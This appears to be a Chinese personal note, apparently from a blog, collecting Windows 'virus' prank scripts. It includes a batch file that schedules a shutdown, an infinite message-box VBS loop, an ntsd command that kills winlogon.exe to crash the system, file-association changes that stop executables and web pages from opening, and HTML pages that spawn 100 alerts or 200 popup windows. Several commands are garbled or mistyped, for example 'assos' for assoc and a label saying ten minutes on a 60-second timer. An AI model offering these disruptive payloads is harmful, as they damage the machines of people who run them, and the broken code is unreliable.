病毒-笔记
来源:https://www.sohu.com/a/378445639_653604?spm=smpc.author.fd-d.3.15837613328082xvJ6ww
来源:http://www.jintiankansha.me/t/5bGwBOFcSj
批处理关机文件:shutdown -s -t 60>1.bat
10min后关机:shutdown -s -t 60
取消关机:shutdown -a
脚本
msgbox "风风还钱">1.vbs
死循环脚本
do
msgbox "风风还钱"
loop
蓝屏炸弹文件:ntsd -c q -pn winlogon.exe>1.bat
NTSD命令详解
1. ntsd -c q -p PID
2. ntsd -c q -pn ImageName 比如:ntsd -c q -pn qq.exe
- c是表示执行debug命令
q表示执行结束后退出(quit)
-p 表示后面紧跟着是你要结束的进程对应的PID
-pn 表示后面紧跟着是你要结束的进程名(process_name.exe 比如:QQ.exe,explorer.exe 等等,值得注意的是后缀名.exe是不可省略的,否则系统会告诉你“不支持此接口”)
只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的,最后那个是Win32子系统,ntsd本身需要它。ntsd从2000开始就是系统自带的用户态调试工具。被调试器附着(attach)的进程会随调试器一起退出,所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限,从而能杀掉大部分的进程。
Windows Logon Process(即winlogon.exe),是Windows NT 用户登陆程序,用于管理用户登录和退出。该进程的正常路径应是C:\Windows\System32,且是以 SYSTEM 用户运行,若不是以上路径且不以 SYSTEM 用户运行,则可能是 W32.Netsky.D@mm 蠕虫病毒,该病毒通过 EMail 邮件传播,当你打开病毒发送的附件时,即会被感染。
把可执行程序变为文本文件:assos .exe=txtfile>1.bat
把可执行程序变为视频文件:assos .exe=mp4file>1.bat
病毒解药:assos .exe=exefile>1.bat
assoc 显示或修改文件扩展名关联。
所有文件都变为文本文件:
assos .exe=txtfile
assos .htm=txtfile
assos .html=txtfile
assos .jpg=txtfile
...
鼠标移动到指定位置即中招的网页
<html>
<head>
<meta http-equiv=“Connect-Type" connect="text/html" ;charset="gb2312">
<title>整人</title>
</head>
<body>
<a href="" onMouseover="alert(1); alert(2); alert(3);... alert(99); alert(100); document.bgColor='black';document.fgColor='white';windows.local.href=‘mailto:33@qq.com? subject=别打我 ’”> 鼠标指我试试</a>
</body>
</html>
无限弹窗网页
<html>
<head>
<meta http-equiv=“Connect-Type" connect="text/html" ;charset="gb2312">
<title>整人-无限弹窗网页</title>
<body>
<script language="JavaScript">
<--
function pop(){
for(i=1;i<=200;i++){window.open('#.html','','width=800,height=600','status=off','location=off')}
}
//-->
</script>
<form name="form">
<p aline="center">
<input type=“button” value="把鼠标放上来试试" onmouseover=pop() name='hahaha">
</form>
<img src=1.jpg>
</body>
</html>
浙公网安备 33010602011771号